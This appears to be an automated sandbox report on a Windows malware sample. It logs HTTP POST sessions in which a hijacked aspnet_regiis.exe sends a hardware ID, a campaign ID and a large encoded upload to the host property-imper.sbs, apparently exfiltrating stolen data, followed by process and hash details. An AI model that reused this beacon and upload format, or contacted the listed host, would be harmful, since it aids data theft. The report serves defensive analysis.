                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1779&sent=14&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21385&delivery_rate=1644144&cwnd=238&unsent_bytes=0&cid=039b017a468f36ad&ts=882&x=0"
                                                                                          2024-11-23 14:10:10 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                          Data Ascii: eok 8.46.123.75
                                                                                          2024-11-23 14:10:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.449741104.21.33.1164437700C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-23 14:10:12 UTC283OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: multipart/form-data; boundary=5TETUHCUZXBZSQTUK6
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 1308
                                                                                          Host: property-imper.sbs
                                                                                          2024-11-23 14:10:12 UTC1308OUTData Raw: 2d 2d 35 54 45 54 55 48 43 55 5a 58 42 5a 53 51 54 55 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 35 54 45 54 55 48 43 55 5a 58 42 5a 53 51 54 55 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 54 45 54 55 48 43 55 5a 58 42 5a 53 51 54 55 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 36 34 32 34
                                                                                          Data Ascii: --5TETUHCUZXBZSQTUK6Content-Disposition: form-data; name="hwid"858A79457327DFB7C8852029FBE145BA--5TETUHCUZXBZSQTUK6Content-Disposition: form-data; name="pid"1--5TETUHCUZXBZSQTUK6Content-Disposition: form-data; name="lid"yau6Na--66424
                                                                                          2024-11-23 14:10:13 UTC1022INHTTP/1.1 200 OK
                                                                                          Date: Sat, 23 Nov 2024 14:10:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=eu9u6vj62pguqlfb3v08k3ig84; expires=Wed, 19-Mar-2025 07:56:51 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UDUj11e6IvHZ1vxsUPxHBikSRfZ%2Fzq3fRROK99o0%2B7Ew%2Fe6t4MRttwINvKIhWHF%2FUEVqqMtEtqsv1jcIuGSpA%2BtIJwn%2FjWrigZKc4MlBB9yZtXIhNyY%2FkhDCTV8KcdMbRmWajks%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e71bdcd6f624204-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1608&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2227&delivery_rate=1772920&cwnd=247&unsent_bytes=0&cid=c8fcc5ca42470d6f&ts=757&x=0"
                                                                                          2024-11-23 14:10:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                          Data Ascii: eok 8.46.123.75
                                                                                          2024-11-23 14:10:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.449743104.21.33.1164437700C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-23 14:10:14 UTC276OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: multipart/form-data; boundary=QV5928JTG
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 569006
                                                                                          Host: property-imper.sbs
                                                                                          2024-11-23 14:10:15 UTC15331OUTData Raw: 2d 2d 51 56 35 39 32 38 4a 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 51 56 35 39 32 38 4a 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 56 35 39 32 38 4a 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 37 35 35 30 37 0d 0a 2d 2d 51 56 35 39 32 38 4a 54 47 0d 0a 43 6f 6e 74 65 6e 74
                                                                                          Data Ascii: --QV5928JTGContent-Disposition: form-data; name="hwid"858A79457327DFB7C8852029FBE145BA--QV5928JTGContent-Disposition: form-data; name="pid"1--QV5928JTGContent-Disposition: form-data; name="lid"yau6Na--6642475507--QV5928JTGContent
                                                                                          2024-11-23 14:10:15 UTC15331OUTData Raw: f3 b2 cb f7 57 5f b1 fb 4c 47 7c 05 06 a4 98 13 00 df 06 cf 62 1e 7e 63 e7 51 be d9 88 c3 df 60 71 c6 e5 ff 33 02 c8 43 2a f0 c8 6f 43 70 3f 88 33 a4 e6 fa 01 66 2e 1f 38 0d 07 44 86 e0 b8 47 65 6b 1d fc 66 f6 63 36 14 43 56 8a 79 51 be f4 d9 b5 94 df 79 53 2d 23 10 b4 97 6f cf 59 eb 03 ad 6d 97 bc 9f c7 79 3d af 16 f1 f4 c0 11 da c4 9b a3 35 1a b8 1c f7 9a 64 b5 fc cb 3f f0 03 61 92 e8 d6 fb 14 e6 22 7b e6 cb 5f db da b1 94 f2 38 05 f3 bc 6f b8 33 9a e9 8d 3e ca a0 f3 09 3d f0 bd 72 ad 92 48 18 db cc 79 77 69 d0 aa 69 27 bf 07 4d 39 19 62 92 b2 7c b5 7d f1 6f 31 1c 91 a0 7a 13 b1 30 21 71 5b 33 7a d4 54 2e ab 3f 0c 91 37 b9 7c 1d 6c 73 be 5b da 7f 95 af ee e3 cf 01 49 4b 23 cc 89 d3 ce bb 9e a4 a2 fe 43 b1 75 15 4a d7 5a a8 19 54 8a 1b fa 8d 50 3e 26 c9
                                                                                          Data Ascii: W_LG|b~cQ`q3C*oCp?3f.8DGekfc6CVyQyS-#oYmy=5d?a"{_8o3>=rHywii'M9b|}o1z0!q[3zT.?7|ls[IK#CuJZTP>&
                                                                                          2024-11-23 14:10:15 UTC15331OUTData Raw: a6 f1 47 6d 6c e0 e5 c2 ee e0 24 7c b0 97 68 b9 c3 57 7a fd 57 ff eb 6f 6d aa dc 23 6a 6a 0a 25 c1 50 71 88 29 c4 98 cd c5 83 6d 3b fe d5 62 a9 75 11 88 41 fa ef c8 f5 f9 97 20 69 e6 bf 43 ac 73 b3 35 bc 01 8d 84 04 10 a7 c8 ff d7 a0 69 a9 fe 3e 51 13 88 80 c3 18 de c9 3d bb fb 80 f4 7e 9a 2a 02 c7 d7 af ef 93 6d 94 49 86 aa 57 77 d6 f5 cb 55 4a 81 c5 c6 1b 90 af e8 b3 f4 e3 6a a2 ed 1f d1 57 b2 ef f3 f6 fc 05 14 c1 b8 7a c2 cf e3 7f da 0a 22 eb 90 03 2d de fa 83 20 05 97 19 e3 d3 a3 10 2d 1c 1d 00 1f 5b 50 29 e2 c8 af eb 6a 78 e2 ae 1a 30 09 bb 09 0f 38 41 44 f0 61 2a e2 35 a9 40 cb 23 77 6f 83 ce 96 fc 29 52 f1 7c ed 1a be d4 24 bd 27 15 31 52 42 e6 32 61 25 60 ef 00 8b 98 b8 8f e4 cd 29 60 46 20 81 ec d5 e3 c9 fc fa 8d 74 09 68 42 bb 96 dc a0 5e 47 89
                                                                                          Data Ascii: Gml$|hWzWom#jj%Pq)m;buA iCs5i>Q=~*mIWwUJjWz"- -[P)jx08ADa*5@#wo)R|$'1RB2a%`)`F thB^G
                                                                                          2024-11-23 14:10:15 UTC15331OUTData Raw: fd b9 b2 fd 63 65 c5 cb 9a 4c 24 0e 11 6e a1 6f 1f 27 df c8 4d 03 74 35 22 95 86 26 f3 a3 78 95 80 07 16 bb 7e 4c c3 52 05 ef 94 63 82 05 4f a1 70 c4 01 ae e1 c1 41 9c 47 89 ca 8b 59 f6 43 93 8f 3c b0 f3 e4 db 37 af ff d0 75 b3 9c 1f 42 8f 74 5e 9c 03 c4 2b 10 51 61 28 1f 05 5c db 0a 9e 3c 81 4b 41 bd fe 7f a7 d6 da 5c b0 56 6f df af 37 68 db 85 eb d7 63 91 77 66 ab 7d 79 cd 8a 4f b9 55 7b 61 bc 78 57 e4 17 8a b3 44 fd 2c bd 1a 02 12 71 90 db e4 de 75 2b 9e 00 79 e0 fc 7d 8e 14 51 83 1b 8a 2b 45 ed ca db a5 87 fd 2e 21 f0 1a 4d ef 14 20 eb b2 d4 57 84 2c 6a 49 a9 a2 38 11 f0 46 54 dd 12 64 36 84 b8 02 c2 50 c1 dc b0 9c d8 48 b5 d6 33 86 be 90 fa 3f 11 2f 0e 91 5a 00 66 11 cd 8e d3 43 ed 04 07 17 7f ba a7 a3 d7 0f ec df bd 11 f7 3b a1 86 cc cf b9 44 28 68
                                                                                          Data Ascii: ceL$no'Mt5"&x~LRcOpAGYC<7uBt^+Qa(\<KA\Vo7hcwf}yOU{axWD,qu+y}Q+E.!M W,jI8FTd6PH3?/ZfC;D(h
                                                                                          2024-11-23 14:10:15 UTC15331OUTData Raw: c9 88 69 64 95 3c 70 99 2f bf f4 40 82 53 08 ea 1f c1 44 7c f3 88 10 ca b8 82 03 38 04 9e bd 12 98 d5 e7 56 04 02 a1 8d d0 42 86 3f 0c ea 87 46 46 06 c2 61 7e eb 1a bd fc 0c 8b a6 c6 40 ba 39 ed f7 09 b2 e9 d1 e3 e1 19 11 da 15 5c 15 6f 84 c2 ea 5b 25 6b b2 55 c0 99 49 79 88 e8 c6 b7 3c 80 c4 23 02 a5 6f f9 9a f8 6b 18 b6 45 6a ae 55 fa dc 24 4d 34 1f 90 14 9e 70 32 d6 e7 4e 61 ce 4c 5e dc bf 9e 3b a4 8e 19 0e 7c 34 38 1c 7c 6c 41 b9 bb 88 d1 aa 2d 66 a7 2d d5 bc 10 cc b8 76 9c 2c b6 fe 5a d3 76 58 be 75 51 d2 be 3e 4c 43 b4 ad 9c 13 c6 4d 11 14 18 09 c2 80 60 0c 8c b1 0d fa 77 09 d0 47 16 8c c4 80 6d 34 ad ea 5c b1 53 0c 26 1c 91 6e 11 a2 ef 65 d7 4c fd 24 34 2e 55 f0 3a e7 6d 3c da fe bc 00 73 55 f8 a0 5d a8 aa df 96 51 ac 63 2e de ff 5b 45 f1 ff 7d 41
                                                                                          Data Ascii: id<p/@SD|8VB?FFa~@9\o[%kUIy<#okEjU$M4p2NaL^;|48|lA-f-v,ZvXuQ>LCM`wGm4\S&neL$4.U:m<sU]Qc.[E}A
                                                                                          2024-11-23 14:10:15 UTC15331OUTData Raw: 26 a2 5a 49 17 4f 4f 66 69 e0 a1 b9 98 71 eb dc ba 08 9e 4b 58 0a 5b eb 02 dd 1c 42 c2 33 92 1f 5f 89 f7 45 52 0d 10 58 23 15 bf 6e 19 32 bf ba ac 5b 30 86 94 40 84 6a 3f 9f 00 31 dc d3 05 99 a4 f3 30 f2 f9 2e 1c ec f2 a8 1e 30 53 f1 91 e5 ed 26 07 49 e7 00 fb fd 6c 71 d6 12 48 6d a3 54 ac 05 ce 82 d3 60 ca 5d 51 0c 68 5e 31 a5 ee 80 8d 41 ad cc ca 81 07 ca 77 37 07 74 31 44 54 85 9a 8c 7b 5e 2f c2 64 53 c6 58 b7 ca ce 02 f9 3f 28 60 4e da b4 a6 8d 14 b4 ef 3a c2 83 36 07 25 54 42 b4 09 43 73 1c 30 8c 87 5b 90 c0 f2 11 dc 25 0a 76 97 2d 0b d3 db 8d 7b c5 41 d9 e6 ed bd 01 28 a0 c1 7e a2 89 a8 2c d4 2a 22 44 cf e9 94 64 40 7d 07 c7 8b 55 c1 69 86 fb 87 8d f5 c3 8e 83 1b 4d 1f 52 0e 8f b3 1f 55 a6 a8 28 53 b3 0c fe 28 f4 1d 1d 0a eb 11 6d 3d 90 5e 1f 46 a1
                                                                                          Data Ascii: &ZIOOfiqKX[B3_ERX#n2[0@j?10.0S&IlqHmT`]Qh^1Aw7t1DT{^/dSX?(`N:6%TBCs0[%v-{A(~,*"Dd@}UiMRU(S(m=^F
                                                                                          2024-11-23 14:10:15 UTC15331OUTData Raw: 90 e3 85 28 f8 b9 38 5a 0e aa d6 e8 6d 96 54 dc ce f4 a6 c5 16 59 f8 d1 84 0b 4c 69 c3 36 45 70 07 25 c1 a1 b9 87 80 74 73 6a da ee e9 5b 97 eb 8e 2b ca 94 37 ea 6a 80 6e 9e 20 fc ce 63 f4 34 9a fe 76 63 d4 32 b7 bf 77 8c ff bb 2d f4 45 9d 70 9d 33 44 66 64 05 f0 df 33 37 ec 47 92 16 f9 f9 3e c2 f4 79 eb f0 3d 05 43 dc bf 70 bc e3 ba 80 1d a3 8c f8 09 f1 a9 5e 41 b6 2d 60 7f 97 25 02 8d 8e dc 3d 24 7e c6 61 ae 34 ab 4b 0d 55 43 69 81 fa e4 c1 a1 8f b8 a4 83 5e 86 da 3d 8a 7d 8e 65 3b 42 cf c8 92 fa 26 70 e9 75 ba 9d 5f 39 43 e5 07 23 91 96 63 98 aa 07 a4 e7 ac 9f 56 57 1a 48 d3 b8 fc ed 1a c3 23 48 26 89 c2 0a f7 40 68 37 51 21 14 11 05 4e 0c 8a dd ba 6b 31 7e 54 e4 90 f8 d1 d5 67 f3 0d a1 0a 24 af 26 ed 12 13 0a 2f 34 74 f9 ee d9 cf be 8c 99 4d de 5a 82
                                                                                          Data Ascii: (8ZmTYLi6Ep%tsj[+7jn c4vc2w-Ep3Dfd37G>y=Cp^A-`%=$~a4KUCi^=}e;B&pu_9C#cVWH#H&@h7Q!Nk1~Tg$&/4tMZ
                                                                                          2024-11-23 14:10:15 UTC15331OUTData Raw: 51 e5 be f2 33 a4 0d b2 cf 60 38 46 46 b7 ff 44 18 bd d6 f5 91 d9 4e 06 51 00 94 97 8e 97 97 1b 78 c5 01 7c f0 82 76 7d b8 b4 a3 1f 67 2a e3 32 20 f4 fb 05 a7 bb 19 7f d6 6d af 6b 37 2a 5e cf 50 e1 ca 9c 23 e9 6f d9 5b 2e 6a 5d a5 71 83 3f 04 8b 6e b5 72 f9 ce b1 b5 63 e6 90 94 cc 4a 95 4d 7b 76 fa a4 ad f7 55 a0 4f 4b 3f 9a d1 1a 9a 4f 53 e7 26 04 ef 4a 9f b2 81 e3 e0 bf 29 fd df 7a 06 6f 1a 02 42 01 d4 83 97 34 b6 e1 08 07 3b 7f 5b 1b ff 40 cf 0e da 78 5d 10 b4 35 76 92 53 c5 3c b8 83 7c 2c bf 8b cd e9 35 16 88 51 ca 1c 7c 2f 07 b4 8e d0 ae 7f 4e cb 55 6c b9 1d a0 fd 38 fc f3 1d e3 5b 5a 60 ba 24 aa 01 51 e9 7d e2 48 10 26 ca 5a 00 dc 42 a1 79 97 4e 39 13 26 45 87 5d a5 64 76 d5 e5 7b 75 4b fd 4d f2 94 1a 13 34 29 c3 40 c2 f5 06 60 c7 b8 37 f5 3b 40 9e
                                                                                          Data Ascii: Q3`8FFDNQx|v}g*2 mk7*^P#o[.j]q?nrcJM{vUOK?OS&J)zoB4;[@x]5vS<|,5Q|/NUl8[Z`$Q}H&ZByN9&E]dv{uKM4)@`7;@
                                                                                          2024-11-23 14:10:15 UTC15331OUTData Raw: aa 2e 02 62 9f f5 05 3c 15 51 ea 52 81 d0 d8 f3 8e 55 2f 8b 3b 6c 08 d7 b7 10 f7 1c e4 8e f9 82 7a 75 46 df 42 cc 7a 18 4c 83 43 2f 2c 86 ab f4 c1 87 65 5b 26 a8 54 ec ac 3f 0d 15 86 83 24 51 e7 57 2b 75 8e 84 c9 6c 8d 06 96 0d 70 6b 74 47 12 09 1d 6d 88 4b bd 85 7e 7c 17 85 40 52 9b 49 e3 ed 75 63 a7 a6 c0 54 99 3d c5 28 b3 7b 16 c2 1b 12 ab 7b a5 df 15 10 bd 44 85 b5 ac fa c2 a2 c2 26 71 ef cc db 30 47 dc b4 ae 60 ce 43 b1 8b 57 5c 22 8c 79 55 fa dd 2c bd 4c 47 73 09 fe dc 7e 18 e1 31 9d 1c cf e8 ae df ac dd 3b c1 73 ec 8a a9 30 2a 94 ba 3e 33 44 df 0d 2b cd f2 ea 94 62 cb d2 a7 dd b4 33 00 8e 0a 33 5b f3 86 af eb 4d 64 07 c4 6f 5a e9 b6 67 33 a4 38 57 0d a8 d7 da 08 5d 3d 6c 8f a3 58 5d 85 cb aa 7a e0 92 76 61 da 60 b2 ea 38 53 7f 7c fd 4c 54 68 80 c8
                                                                                          Data Ascii: .b<QRU/;lzuFBzLC/,e[&T?$QW+ulpktGmK~|@RIucT=({{D&q0G`CW\"yU,LGs~1;s0*>3D+b33[MdoZg38W]=lX]zva`8S|LTh
                                                                                          2024-11-23 14:10:15 UTC15331OUTData Raw: df 18 2f 0f 8e c8 81 77 32 7a 48 f0 b4 4f 34 dd 3c e4 c7 76 cb fe 64 93 ab 5b 3f 9e 09 6b 80 93 eb 76 ea fc 9f 01 8e ab 95 b0 44 5c 21 2f d0 59 bb ed 75 eb ae f3 51 ea 0f 24 da af f6 d6 bb 24 39 f0 5b ee 94 2e ee 79 9d 38 84 e3 aa 04 54 49 df fc a8 92 f0 16 43 b4 ad 41 61 07 95 77 a3 8f ed 35 82 1d 21 d9 2a 70 b8 fe 7a 5a 98 9b 4a e3 6e 13 de d3 a3 ef 3a f1 79 51 43 31 f3 57 cd d2 3a c4 6f 11 85 3e 3b 50 bb 92 43 07 ee c8 6d d8 5f 5b fb 28 82 e7 be a0 8b d2 30 86 87 04 95 14 13 2c b3 05 5f 1f d5 fa 14 fd 66 93 7d a4 d8 03 ca 76 f2 52 97 f6 a2 52 5c b0 73 e3 c5 c2 77 9d 9b 23 79 59 18 8e 9b 99 f4 34 06 c2 cd b9 36 63 c7 d7 de d6 44 1f c1 ea b7 72 3b 9d 0c 14 d7 6a e3 48 55 7c f8 c4 60 0d bd 36 b1 39 1a 61 d8 e4 6f 16 c1 bb ba 22 1f 13 d9 23 9f 17 d6 c4 f2
                                                                                          Data Ascii: /w2zHO4<vd[?kvD\!/YuQ$$9[.y8TICAaw5!*pzZJn:yQC1W:o>;PCm_[(0,_f}vRR\sw#yY46cDr;jHU|`69ao"#
                                                                                          2024-11-23 14:10:17 UTC1021INHTTP/1.1 200 OK
                                                                                          Date: Sat, 23 Nov 2024 14:10:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=crrqen0bt074bo3in3cc34d74t; expires=Wed, 19-Mar-2025 07:56:55 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mMyMCWRAb5VAtmsIrD8YH31nXUh4CogmHaHio1gWOyF5PjaKVtRoFntl9TjyazJ%2FaaFJlyEj11DYBaB6pcyKMUQvo%2FyvGldAtpMCCq7suv1ASu1wDvO3lYVBv2Jdm1tFn2Pv%2BS8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e71bddcddee8c4d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1865&sent=342&recv=592&lost=0&retrans=0&sent_bytes=2845&recv_bytes=571546&delivery_rate=1358771&cwnd=158&unsent_bytes=0&cid=67239dc2c053329f&ts=2310&x=0"


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.449746104.21.33.1164437700C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-23 14:10:18 UTC266OUTPOST /api HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                          Content-Length: 87
                                                                                          Host: property-imper.sbs
                                                                                          2024-11-23 14:10:18 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 37 35 35 30 37 26 6a 3d 26 68 77 69 64 3d 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41
                                                                                          Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6642475507&j=&hwid=858A79457327DFB7C8852029FBE145BA
                                                                                          2024-11-23 14:10:19 UTC1007INHTTP/1.1 200 OK
                                                                                          Date: Sat, 23 Nov 2024 14:10:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Set-Cookie: PHPSESSID=0r502g7euboqf0v3osmg4i7775; expires=Wed, 19-Mar-2025 07:56:57 GMT; Max-Age=9999999; path=/
                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          cf-cache-status: DYNAMIC
                                                                                          vary: accept-encoding
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9j4VWN2FbNCvxRi762hAcOdlcc22cxUKYwrmPPcK0XhQYKmHh9XWVoz1DwAaZzQwTisNjoBgx2pWpqZVXLWzf3ibyKBSnJXRjp2WuZ2PtQZpjkLf6VexEox5GN0hMO8G4HDIoo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e71bdf38911727b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1815&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=989&delivery_rate=1526398&cwnd=249&unsent_bytes=0&cid=c4d7c1418f41f79b&ts=716&x=0"
                                                                                          2024-11-23 14:10:19 UTC54INData Raw: 33 30 0d 0a 71 35 67 78 58 31 7a 77 62 71 4d 4e 30 32 37 6a 31 5a 44 78 51 4d 64 79 6e 49 50 66 41 4b 43 78 43 45 56 46 51 38 77 47 6a 56 37 77 78 51 3d 3d 0d 0a
                                                                                          Data Ascii: 30q5gxX1zwbqMN027j1ZDxQMdynIPfAKCxCEVFQ8wGjV7wxQ==
                                                                                          2024-11-23 14:10:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:09:09:57
                                                                                          Start date:23/11/2024
                                                                                          Path:C:\Users\user\Desktop\S#U043eftWare.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\S#U043eftWare.exe"
                                                                                          Imagebase:0x4f0000
                                                                                          File size:707'072 bytes
                                                                                          MD5 hash:82C56F5E8DCAE969405B4F02BE0D785A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:1
                                                                                          Start time:09:09:57
                                                                                          Start date:23/11/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:09:09:58
                                                                                          Start date:23/11/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                          Imagebase:0xa50000
                                                                                          File size:43'016 bytes
                                                                                          MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:09:09:58
                                                                                          Start date:23/11/2024
                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1228
                                                                                          Imagebase:0xbc0000
                                                                                          File size:483'680 bytes
                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:13.8%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:14.5%
                                                                                            Total number of Nodes:688
                                                                                            Total number of Limit Nodes:23
                                                                                            execution_graph 10810 6cdd138e 10811 6cdd13cc 10810->10811 10812 6cdd1399 10810->10812 10849 6cdd14e8 10811->10849 10814 6cdd13be 10812->10814 10815 6cdd139e 10812->10815 10822 6cdd13e1 10814->10822 10817 6cdd13b4 10815->10817 10818 6cdd13a3 10815->10818 10841 6cdd199b 10817->10841 10821 6cdd13a8 10818->10821 10836 6cdd19ba 10818->10836 10823 6cdd13ed ___scrt_is_nonwritable_in_current_image 10822->10823 10876 6cdd1a2b 10823->10876 10825 6cdd13f4 __DllMainCRTStartup@12 10826 6cdd141b 10825->10826 10827 6cdd14e0 10825->10827 10834 6cdd1457 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10825->10834 10887 6cdd198d 10826->10887 10895 6cdd1bca IsProcessorFeaturePresent 10827->10895 10830 6cdd14e7 10831 6cdd142a __RTC_Initialize 10831->10834 10890 6cdd18ab InitializeSListHead 10831->10890 10833 6cdd1438 10833->10834 10891 6cdd1962 10833->10891 10834->10821 10989 6cdd3c21 10836->10989 11293 6cdd2870 10841->11293 10845 6cdd19b7 10845->10821 10847 6cdd287b 21 API calls 10848 6cdd19a4 10847->10848 10848->10821 10850 6cdd14f4 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10849->10850 10851 6cdd14fd 10850->10851 10852 6cdd1525 10850->10852 10853 6cdd1590 10850->10853 10851->10821 11313 6cdd19fb 10852->11313 10854 6cdd1bca __DllMainCRTStartup@12 4 API calls 10853->10854 10858 6cdd1597 ___scrt_is_nonwritable_in_current_image 10854->10858 10856 6cdd152a 11322 6cdd18b7 10856->11322 10859 6cdd15cd dllmain_raw 10858->10859 10861 6cdd15c8 10858->10861 10872 6cdd15b3 